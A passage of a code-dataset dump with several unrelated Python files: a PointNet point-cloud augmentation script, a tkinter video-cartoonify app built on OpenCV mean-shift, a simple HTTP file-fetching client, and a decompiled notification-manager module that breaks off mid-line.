cur_seg[nlabel][npoint]!=27 and cur_seg[nlabel][npoint]!=30 and \\\n cur_seg[nlabel][npoint]!=31 and cur_seg[nlabel][npoint]!=34 and cur_seg[nlabel][npoint]!=40 and cur_seg[nlabel][npoint]!=42 and \\\n cur_seg[nlabel][npoint]!=46 and cur_seg[nlabel][npoint]!=49:\n jittered_data[nlabel][npoint][:]=0\n cur_data=cur_data+jittered_data\n object_data=np.vstack((object_data,cur_data))\n object_labels=np.vstack((object_labels,cur_labels))\n object_seg=np.vstack((object_seg,cur_seg))\t\n print('train_file '+str(i)+' success')\n #object_data, object_labels and object_seg above now contain all the qualifying data\n 
num=object_data.shape[0]\n idx=np.random.randint(1,num,size=1)#randomly pick one sample to fill the first initialized entry\n object_data[0,:,:]=object_data[idx,:,:]#the all-zero first entry is initialized with an arbitrary sample\n object_labels[0]=object_labels[idx]\n object_seg[0,:]=object_seg[idx,:]\n return object_data,object_labels,object_seg\n \ndef object_aug(object_data,object_labels,object_seg):\n #merge all the data\n #render one sample for inspection\n render_file=os.path.join(BASE_DIR,'render_aug_part.obj')\n output_point_cloud(object_data[3,:,:],render_file)\n \n for i in range(num_train_file):\n cur_train_filename = os.path.join(hdf5_data_dir, train_file_list[i])\n cur_data, cur_labels, cur_seg = provider.loadDataFile_with_seg(cur_train_filename)\n object_data=np.vstack((object_data,cur_data))\n object_labels=np.vstack((object_labels,cur_labels))\n object_seg=np.vstack((object_seg,cur_seg))\t\n object_data,object_labels,object_seg=provider.shuffle_data_with_seg(object_data,object_labels,object_seg)\n #split the data into several files\n n_object=object_data.shape[0]\n num_every_file=n_object//8\n for i in range(8):\n f=h5py.File(hdf5_data_dir+'/object_part_aug'+str(i)+'.h5','w')\n f['data']=object_data[i*(num_every_file):(i+1)*num_every_file,:,:]\n f['label']=object_labels[i*(num_every_file):(i+1)*num_every_file]\n f['pid']=object_seg[i*(num_every_file):(i+1)*num_every_file,:]\n f.close()\n\nif __name__=='__main__':\n data,labels,seg=find_all_needto_aug_part()\n #f=h5py.File(hdf5_data_dir+'/object_part_aug.h5','w')\n #f['data']=data\n #f['label']=labels\n #f['pid']=seg\n # f.close()\n object_aug(data,labels,seg)\n", "repo_name": "legendhua/PointNet_codes", "sub_path": "part_segmentation/data_part_aug.py", "file_name": "data_part_aug.py", "file_ext": "py", "file_size_in_byte": 4007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "provider.getDataFiles", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "provider.loadDataFile_with_seg", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 36, "usage_type": "call"}, 
{"api_name": "numpy.random", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "provider.loadDataFile_with_seg", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 67, "usage_type": "call"}, {"api_name": "provider.shuffle_data_with_seg", "line_number": 68, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "14771401917", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 15 10:47:41 2021\r\n\r\n@author: postulate-31\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 7 11:15:15 2021\r\n\r\n@author: AMKnp.array([[0, 0],\r\n [0, mm]])\r\n\r\n\"\"\"\r\n\r\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\r\n\r\nimport cv2 #for image processing\r\nimport easygui #to open the filebox\r\nimport numpy as np #to store image\r\nimport imageio #to read image stored at particular path\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom tkinter import Label,Button,TOP\r\nfrom PIL import ImageTk, Image\r\nfrom tkinter import messagebox\r\n\r\n\r\n\r\ndef upload():\r\n ImagePath=easygui.fileopenbox()\r\n cartoonify(ImagePath)\r\n#upload()\r\ndef cartoonify(ImagePath):\r\n \r\n messagebox.showinfo(\"showinfo\", \"Start Converting....\")\r\n vidObj = cv2.VideoCapture(ImagePath)\r\n video_count = 0\r\n \r\n out = cv2.VideoWriter('outputvideo/carton_video.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 10, (500,500))\r\n \r\n # checks whether frames were extracted\r\n success = 1\r\n \r\n while video_count<100:\r\n #while video_count<30:\r\n success, image = vidObj.read()\r\n sha=image.shape\r\n image=cv2.resize(image,(500,500))\r\n img_main=image\r\n \r\n cv2.imwrite(f\"original/frame{video_count}.jpg\",image)\r\n \r\n #MEAN SHIFT\r\n \r\n mimg=cv2.medianBlur(image,5)\r\n originImg=mimg\r\n # Shape of original image \r\n originShape = originImg.shape\r\n \r\n \r\n flatImg=np.reshape(originImg, [-1, 3])\r\n \r\n bandwidth = estimate_bandwidth(flatImg, quantile=0.1, n_samples=100) \r\n ms = MeanShift(bandwidth = bandwidth, bin_seeding=True)\r\n \r\n # Performing meanshift on flatImg \r\n ms.fit(flatImg)\r\n \r\n # (r,g,b) vectors corresponding to the different clusters after meanshift \r\n labels=ms.labels_\r\n \r\n # Remaining colors after meanshift \r\n cluster_centers = ms.cluster_centers_ \r\n \r\n # Finding and diplaying the number of clusters \r\n labels_unique = np.unique(labels) \r\n n_clusters_ = len(labels_unique) \r\n #print(\"number of estimated clusters : %d\" % n_clusters_) \r\n \r\n segmentedImg2 = cluster_centers[np.reshape(labels, originShape[:2])]\r\n \r\n 
cv2.imwrite('meanshift.jpg',segmentedImg2)\r\n \r\n '''' main '''\r\n originalmage = img_main\r\n originalmage = cv2.cvtColor(originalmage, cv2.COLOR_BGR2RGB)\r\n \r\n if originalmage is None:\r\n print(\"Can not find any image. Choose appropriate file\")\r\n sys.exit()\r\n # ReSized1 = cv2.resize(originalmage, (960, 540))\r\n #plt.imshow(ReSized1, cmap='gray')\r\n grayScaleImage = cv2.cvtColor(originalmage, cv2.COLOR_BGR2GRAY)\r\n #ReSized2 = cv2.resize(grayScaleImage, (960, 540))\r\n imr=originalmage\r\n imr=cv2.cvtColor(imr, cv2.COLOR_BGR2RGB)\r\n gaussian=cv2.GaussianBlur(imr,(7,7),0 )\r\n gaussian=cv2.cvtColor(gaussian, cv2.COLOR_BGR2RGB)\r\n #ReSized3 = cv2.resize(gaussian, (960, 540))\r\n \r\n #Meanshift here\r\n means=cv2.imread('meanshift.jpg')\r\n means = cv2.cvtColor(means, cv2.COLOR_BGR2RGB)\r\n \r\n Meanshift=means\r\n grayScaleImage = cv2.cvtColor(Meanshift, cv2.COLOR_BGR2GRAY)\r\n \r\n getEdge = cv2.adaptiveThreshold(grayScaleImage, 70, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 11)\r\n \r\n #ReSized4 = cv2.resize(getEdge, (960, 540))\r\n \r\n \r\n global cartoonImage\r\n cartoonImage = cv2.bitwise_and(Meanshift, Meanshift, mask=getEdge)\r\n #ReSized6 = cv2.resize(cartoonImage, (960, 540))\r\n #plt.imshow(ReSized6, cmap='gray')\r\n # Plotting the whole transition\r\n # images=[ReSized1, ReSized2, ReSized4, ReSized3,Meanshift, ReSized6]\r\n # tle=[\"Real Image\",\"GrayScale Image\",\"ThreshHold Image\",\"GaussianBlur\",'MeanShift Cluster',\"Cartoonyfy Image\"]\r\n \r\n # fig, axes = plt.subplots(3,2, figsize=(8,8), subplot_kw={'xticks':[], 'yticks':[]}, gridspec_kw=dict(hspace=0.1, wspace=0.1))\r\n # for i, ax in enumerate(axes.flat):\r\n # ax.set_title(tle[i])\r\n # ax.imshow(images[i], cmap='gray')\r\n \r\n # plt.show()\r\n #cv2.imwrite('cartoonified_Image.jpg',cv2.cvtColor(cartoonImage, cv2.COLOR_BGR2RGB))\r\n \r\n \r\n #cv2.imwrite(f\"cv/frame{video_count}.jpg\", segmentedImg2)\r\n # rim=cv2.resize(src, sha)\r\n ct=cv2.cvtColor(cartoonImage, cv2.COLOR_BGR2RGB)\r\n out.write(ct)\r\n cv2.imwrite(f\"cv/frame{video_count}.jpg\",ct)\r\n \r\n video_count+=1\r\n \r\n vidObj.release()\r\n out.release()\r\n messagebox.showinfo(\"showinfo\", \"Finish Converting....\")\r\n\r\n# \r\n#def save(cartoonImage, ImagePath):\r\n# #saving an image using imwrite()\r\n# newName=\"cartoonified_Image\"\r\n# path1 = os.path.dirname(ImagePath)\r\n# extension=os.path.splitext(ImagePath)[1]\r\n# path = os.path.join(path1, newName+extension)\r\n# cv2.imwrite(path, cv2.cvtColor(cartoonImage, cv2.COLOR_BGR2RGB))\r\n# I = \"Image saved by name \" + newName +\" at \"+ path\r\n# tk.messagebox.showinfo(title=None, message=I)\r\n## cv2.imwrite('cartoonified_Image.jpg',)\r\n#\r\n# \r\n \r\ntop=tk.Tk()\r\ntop.geometry('400x400')\r\ntop.title('Cartoonify Your Video !')\r\ntop.configure(background='white')\r\nlabel=Label(top,background='#CDCDCD', font=('calibri',20,'bold'))\r\nupload=Button(top,text=\"Cartoonify an video\",command=upload,padx=10,pady=5)\r\nupload.configure(background='#364156', foreground='white',font=('calibri',10,'bold'))\r\nupload.pack(side=TOP,pady=50)\r\n#save1=Button(top,text=\"Save cartoon image\",command=lambda: save(cartoonImage,ImagePath),padx=30,pady=5)\r\n#save1.configure(background='#364156', foreground='white',font=('calibri',10,'bold'))\r\n#save1.pack(side=TOP,pady=50)\r\ntop.mainloop()", "repo_name": "Muthukumar1303/DS-Projects", "sub_path": "cartoonify image and video/video_main.py", "file_name": "video_main.py", "file_ext": "py", "file_size_in_byte": 6024, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "easygui.fileopenbox", "line_number": 35, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 40, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 40, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.cluster.estimate_bandwidth", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.cluster.MeanShift", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 98, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 101, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 103, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 107, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 108, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 111, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.adaptiveThreshold", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.ADAPTIVE_THRESH_MEAN_C", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_and", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 137, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 139, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 145, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 145, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 161, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 165, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 166, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 168, "usage_type": "name"}]} +{"seq_id": "10112669020", "text": "import sys\nimport http.client\nimport urllib, parser\n\n# Usage: python3 client.py \nserver = sys.argv[1]\nport 
= int(sys.argv[2]) # Only accept integers\nfilename = sys.argv[3]\n\nconnection = http.client.HTTPConnection(server, port)\nconnection.request(\"GET\", '/' + filename)\nresponse = connection.getresponse()\n\nprint (response.status, response.reason)\nprint (response.headers)\n\nf = open('./client-' + filename, \"w+\")\nprint(str(response.read(), encoding = \"utf-8\"), file = f)\n\nconnection.close()", "repo_name": "Minaduki-Shigure/computer_networking", "sub_path": "socket/1_WebServer/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 515, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "http.client.client.HTTPConnection", "line_number": 10, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 10, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "37023044171", "text": "#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\scriber\\hermes\\__init__.py\r\nimport datetime\r\nimport uuid\r\nimport json\r\nimport typeutils\r\nimport logging\r\nlog = logging.getLogger('hermes')\r\n\r\nclass UpdateListener(object):\r\n\r\n def __init__(self, user_id, stamp):\r\n self.user_id = user_id\r\n self.stamp = stamp\r\n self.is_triggered = False\r\n self.created = datetime.datetime.now()\r\n self.updated = datetime.datetime.now()\r\n\r\n def __str__(self):\r\n return '' % (self.user_id,\r\n self.stamp,\r\n self.is_triggered,\r\n id(self))\r\n\r\n\r\nclass ReadStatus(object):\r\n\r\n def __init__(self, is_shown = False, is_read = False, is_closed = False, is_dismissed = False):\r\n self.is_shown = is_shown\r\n self.is_read = is_read\r\n self.is_closed = is_closed\r\n self.is_dismissed = is_dismissed\r\n\r\n\r\nclass HermesError(Exception):\r\n pass\r\n\r\n\r\nclass NotificationError(HermesError):\r\n pass\r\n\r\n\r\nclass NotificationNotFound(NotificationError):\r\n pass\r\n\r\n\r\nclass NotificationUpdateError(NotificationError):\r\n pass\r\n\r\n\r\nclass NotificationDismissError(NotificationError):\r\n pass\r\n\r\n\r\nclass Notification(object):\r\n TYPE_INFO = 1\r\n TYPE_WARNING = 2\r\n TYPE_ALERT = 3\r\n PERSISTENCE_SILENT = 1\r\n PERSISTENCE_QUICK = 2\r\n PERSISTENCE_STICKY = 3\r\n\r\n def __init__(self, title, body = None, icon = None, notification_type = None, persistence = None, on_click = None, sender = None, notification_id = None, expires = None, can_dismiss = True, is_shared = False, on_respond = None, hide_recipients = False, channels = None):\r\n self.title = title\r\n self.body = body\r\n self.icon = icon\r\n self.notification_type = notification_type or Notification.TYPE_INFO\r\n self.persistence = persistence or Notification.PERSISTENCE_QUICK\r\n self.on_click = on_click\r\n self.sender = sender\r\n self.expires = expires\r\n self.can_dismiss = can_dismiss\r\n self.is_shared = is_shared\r\n self.on_respond = on_respond\r\n self.hide_recipients = hide_recipients\r\n self.channel_list = []\r\n self._parse_channels(channels)\r\n self.notification_id = notification_id or uuid.uuid4().hex\r\n self.created = datetime.datetime.now()\r\n self.who_is_on_it = None\r\n self.response_datetime = None\r\n self.shared_dismiss = False\r\n self._to_users = None\r\n 
self._to_user_types = None\r\n self._to_user_roles = None\r\n self._read_status_map = {}\r\n self.update_stamp = 0\r\n\r\n def update_notification(self, notification):\r\n self.title = notification.title\r\n self.body = notification.body\r\n self.icon = notification.icon\r\n self.notification_type = notification.notification_type\r\n self.persistence = notification.persistence\r\n self.on_click = notification.on_click\r\n self.sender = notification.sender\r\n self.expires = notification.expires\r\n self.can_dismiss = notification.can_dismiss\r\n self.is_shared = notification.is_shared\r\n self.on_respond = notification.on_respond\r\n self.who_is_on_it = notification.who_is_on_it\r\n self.response_datetime = notification.response_datetime\r\n self.shared_dismiss = notification.shared_dismiss\r\n self.hide_recipients = notification.hide_recipients\r\n self.channel_list = notification.channel_list\r\n\r\n def to_dict(self, user_id = None, quotes_to_html = False):\r\n fixed_body = self.body\r\n fixed_title = self.title\r\n if quotes_to_html:\r\n fixed_body = fixed_body.replace('\"', '"')\r\n fixed_title = fixed_title.replace('\"', '"')\r\n buff_map = {'title': unicode(fixed_title),\r\n 'body': unicode(fixed_body) if self.body else '',\r\n 'icon': self.icon,\r\n 'notification_type': self.notification_type,\r\n 'persistence': self.persistence,\r\n 'on_click': self.on_click,\r\n 'expires': None if not isinstance(self.expires, datetime.datetime) else self.expires.isoformat(),\r\n 'can_dismiss': self.can_dismiss,\r\n 'is_shared': self.is_shared,\r\n 'on_respond': self.on_respond,\r\n 'notification_id': self.notification_id,\r\n 'created': self.created.isoformat(),\r\n 'who_is_on_it': unicode(self.who_is_on_it),\r\n 'response_datetime': self.response_datetime,\r\n 'hide_recipients': self.hide_recipients,\r\n 'sender': unicode(self.sender) if self.body else '',\r\n 'update_stamp': self.update_stamp,\r\n 'channels': self.channel_list}\r\n if not self.hide_recipients:\r\n buff_map['to_users'] = self._to_users\r\n buff_map['to_user_types'] = self._to_user_types\r\n buff_map['to_user_roles'] = self._to_user_roles\r\n buff_map['is_global'] = self.is_global()\r\n if user_id:\r\n buff_map['is_shown'] = self.is_shown(user_id)\r\n buff_map['is_read'] = self.is_read(user_id)\r\n buff_map['is_closed'] = self.is_closed(user_id)\r\n buff_map['is_dismissed'] = self.is_dismissed(user_id)\r\n return buff_map\r\n\r\n def to_json(self, user_id = None):\r\n return json.dumps(self.to_dict(user_id))\r\n\r\n def mark_shown(self, user_id):\r\n if user_id not in self._read_status_map:\r\n self._read_status_map[user_id] = ReadStatus()\r\n self._read_status_map[user_id].is_shown = True\r\n\r\n def mark_read(self, user_id):\r\n if user_id not in self._read_status_map:\r\n self._read_status_map[user_id] = ReadStatus()\r\n self._read_status_map[user_id].is_read = True\r\n\r\n def mark_closed(self, user_id):\r\n if user_id not in self._read_status_map:\r\n self._read_status_map[user_id] = ReadStatus()\r\n self._read_status_map[user_id].is_closed = True\r\n\r\n def mark_dismissed(self, user_id):\r\n if user_id not in self._read_status_map:\r\n self._read_status_map[user_id] = ReadStatus()\r\n self._read_status_map[user_id].is_shown = True\r\n self._read_status_map[user_id].is_dismissed = True\r\n\r\n def is_expired(self):\r\n if self.expires:\r\n return self.expires < datetime.datetime.now()\r\n return False\r\n\r\n def is_global(self):\r\n return not self._to_users and not self._to_user_types and not self._to_user_roles\r\n\r\n 
def is_shown(self, user_id):\r\n if user_id in self._read_status_map:\r\n return self._read_status_map[user_id].is_shown\r\n return False\r\n\r\n def is_read(self, user_id):\r\n if user_id in self._read_status_map:\r\n return self._read_status_map[user_id].is_read\r\n return False\r\n\r\n def is_closed(self, user_id):\r\n if user_id in self._read_status_map:\r\n return self._read_status_map[user_id].is_closed\r\n return False\r\n\r\n def is_dismissed(self, user_id):\r\n if user_id in self._read_status_map:\r\n return self._read_status_map[user_id].is_dismissed\r\n return False\r\n\r\n def in_channels(self, channel_list):\r\n if self.channel_list:\r\n for channel in channel_list:\r\n if channel in self.channel_list:\r\n return True\r\n\r\n return False\r\n else:\r\n return True\r\n\r\n def _parse_channels(self, channels):\r\n if channels:\r\n if not isinstance(channels, (list, tuple)):\r\n channels = [str(channels)]\r\n for chan in channels:\r\n parts = chan.split('.')\r\n for i, chan_part in enumerate(parts):\r\n cc = [chan_part]\r\n while i > 0:\r\n i -= 1\r\n cc.append(parts[i])\r\n\r\n cc.reverse()\r\n sub_chan = '.'.join(cc)\r\n if sub_chan not in self.channel_list:\r\n self.channel_list.append(sub_chan)\r\n\r\n def __repr__(self):\r\n return '' % (self.notification_id, self.title)\r\n\r\n def __str__(self):\r\n return self.__repr__()\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, Notification):\r\n return self.notification_id == other.notification_id\r\n return False\r\n\r\n def __ne__(self, other):\r\n return not self.__eq__(other)\r\n\r\n def __hash__(self):\r\n return hash(self.notification_id)\r\n\r\n\r\nclass Hermes(object):\r\n\r\n def __init__(self, listener_limit = 10):\r\n self.notification_map = {}\r\n self._by_user_id = {}\r\n self._by_user_type = {}\r\n self._by_user_role = {}\r\n self._global_notification_list = []\r\n now = datetime.datetime.now()\r\n self._update_trigger = (now.year % 2000 * 1000 + now.month * 10 + now.day) * 1000000\r\n self._update_listeners = {}\r\n self._listener_limit = listener_limit\r\n log.info('Hermes::__init__(listener_limit=%s) - _update_trigger=%s' % (listener_limit, self._update_trigger))\r\n\r\n def send_notification(self, notification, users = None, user_types = None, user_role_masks = None):\r\n log.info('Hermes::send_notification() users=%s, user_types=%s, user_role_masks=%s, notification=%s' % (users,\r\n user_types,\r\n user_role_masks,\r\n notification.to_json()))\r\n old_notification = self.get_notification(notification.notification_id)\r\n if old_notification:\r\n self.cancel_notification(old_notification)\r\n notification.update_stamp = self._update_trigger\r\n self.notification_map[notification.notification_id] = notification\r\n if not users and not user_types and not user_role_masks:\r\n self._global_notification_list.append(notification)\r\n else:\r\n if users:\r\n self._send_to_users(notification, users)\r\n if user_types:\r\n self._send_to_user_types(notification, user_types)\r\n if user_role_masks:\r\n self._send_to_user_roles(notification, user_role_masks)\r\n self.trigger_update()\r\n\r\n def update_notification(self, notification):\r\n log.info('Hermes::update_notification() notification=%s' % notification.to_json())\r\n if notification:\r\n if notification.notification_id not in self.notification_map:\r\n raise NotificationUpdateError('Notification not found: notification_id=%s' % notification.notification_id)\r\n self.notification_map[notification.notification_id].update_notification(notification)\r\n 
self.trigger_update()\r\n\r\n def get_notification(self, notification_id):\r\n if notification_id in self.notification_map:\r\n return self.notification_map[notification_id]\r\n\r\n def cancel_notification(self, notification_or_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n log.debug('Hermes::cancel_notification() notification=%s' % notification.to_json())\r\n if notification:\r\n remove_buffer = []\r\n if notification in self._global_notification_list:\r\n self._global_notification_list.remove(notification)\r\n for notification_batch in (self._by_user_id, self._by_user_type, self._by_user_role):\r\n for key, notification_list in notification_batch.iteritems():\r\n if notification in notification_list:\r\n notification_list.remove(notification)\r\n if not notification_list:\r\n remove_buffer.append((key, notification_batch))\r\n\r\n if notification.notification_id in self.notification_map:\r\n del self.notification_map[notification.notification_id]\r\n for key, dict_ref in remove_buffer:\r\n del dict_ref[key]\r\n\r\n self.trigger_update()\r\n\r\n def get_notification_list(self, user_id, user_type, user_role_mask, channel_list = None):\r\n notification_list = []\r\n expired_list = []\r\n channel_list = channel_list or []\r\n for notification_batch in (self._get_by_user_id(user_id),\r\n self._get_by_user_type(user_type),\r\n self._get_by_user_role_masks(user_role_mask),\r\n self._global_notification_list):\r\n for notification in notification_batch:\r\n if notification.is_expired():\r\n expired_list.append(notification.notification_id)\r\n elif not notification.is_dismissed(user_id) and notification not in notification_list:\r\n if notification.in_channels(channel_list):\r\n notification_list.append(notification)\r\n\r\n for notification_id in expired_list:\r\n self.cancel_notification(notification_id)\r\n\r\n notification_list.sort(key=lambda n: n.created, reverse=True)\r\n return notification_list\r\n\r\n def last_trigger(self):\r\n return self._update_trigger\r\n\r\n def mark_read(self, notification_or_id, user_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n if not notification:\r\n raise NotificationNotFound('No notification with identifier \"%s\" was found' % notification_or_id)\r\n log.info('Hermes::mark_read(notification_id=%s, user_id=%s)' % (notification.notification_id, user_id))\r\n if notification.is_expired():\r\n self.cancel_notification(notification)\r\n else:\r\n notification.mark_read(user_id)\r\n self.trigger_update()\r\n return True\r\n\r\n def mark_closed(self, notification_or_id, user_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n if not notification:\r\n raise NotificationNotFound('No notification with identifier \"%s\" was found' % notification_or_id)\r\n if notification.is_expired():\r\n self.cancel_notification(notification)\r\n else:\r\n notification.mark_closed(user_id)\r\n self.trigger_update()\r\n return True\r\n\r\n def respond(self, notification_or_id, user_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n if not notification:\r\n raise NotificationNotFound('No notification with identifier \"%s\" was found' % notification_or_id)\r\n if notification.is_shared and notification.who_is_on_it:\r\n return notification.who_is_on_it\r\n if notification.is_expired():\r\n self.cancel_notification(notification)\r\n else:\r\n notification.mark_read(user_id)\r\n notification.mark_closed(user_id)\r\n notification.response_datetime = datetime.datetime.now()\r\n 
notification.who_is_on_it = user_id\r\n self.trigger_update()\r\n return user_id\r\n\r\n def dismiss(self, notification_or_id, user_id):\r\n notification = self._id_to_notification(notification_or_id)\r\n if not notification:\r\n raise NotificationNotFound('No notification with identifier \"%s\" was found' % notification_or_id)\r\n log.info('Hermes::dismiss(notification_id=%s, user_id=%s)' % (notification.notification_id, user_id))\r\n if not notification.can_dismiss:\r\n raise NotificationDismissError('This notification can not be dismissed')\r\n if notification.is_expired() or notification.is_shared:\r\n self.cancel_notification(notification)\r\n else:\r\n notification.mark_dismissed(user_id)\r\n self.trigger_update()\r\n return True\r\n\r\n def get_listener(self, user_id, stamp):\r\n if user_id not in self._update_listeners:\r\n self._update_listeners[user_id] = UpdateListener(user_id, stamp)\r\n self._update_listeners[user_id].updated = datetime.datetime.now()\r\n return self._update_listeners[user_id]\r\n\r\n def remove_listener(self, update_listener):\r\n if update_listener.user_id in self._update_listeners:\r\n del self._update_listeners[update_listener.user_id]\r\n\r\n def trigger_listeners(self):\r\n for user_id, listener in self._update_listeners.items():\r\n if listener.stamp < self._update_trigger:\r\n self.remove_listener(listener)\r\n listener.is_triggered = True\r\n\r\n def trigger_update(self):\r\n self._update_trigger += 1\r\n self.trigger_listeners()\r\n\r\n def _id_to_notification(self, notification_or_id):\r\n if isinstance(notification_or_id, Notification):\r\n notification_or_id = notification_or_id.notification_id\r\n return self.get_notification(notification_or_id)\r\n\r\n def _get_by_user_id(self, user_id):\r\n if user_id in self._by_user_id:\r\n return self._by_user_id[user_id]\r\n return []\r\n\r\n def _get_by_user_type(self, user_type):\r\n if user_type in self._by_user_type:\r\n return self._by_user_type[user_type]\r\n return []\r\n\r\n def _get_by_user_role_masks(self, role_masks):\r\n buff = []\r\n role_list = self._extract_role_list(role_masks)\r\n for role in role_list:\r\n if role in self._by_user_role:\r\n buff.extend(self._by_user_role[role])\r\n\r\n return buff\r\n\r\n def _send_to_users(self, notification, users):\r\n if not hasattr(users, '__iter__'):\r\n users = [users]\r\n for user_id in users:\r\n if user_id not in self._by_user_id:\r\n self._by_user_id[user_id] = []\r\n self._by_user_id[user_id].append(notification)\r\n\r\n notification._to_users 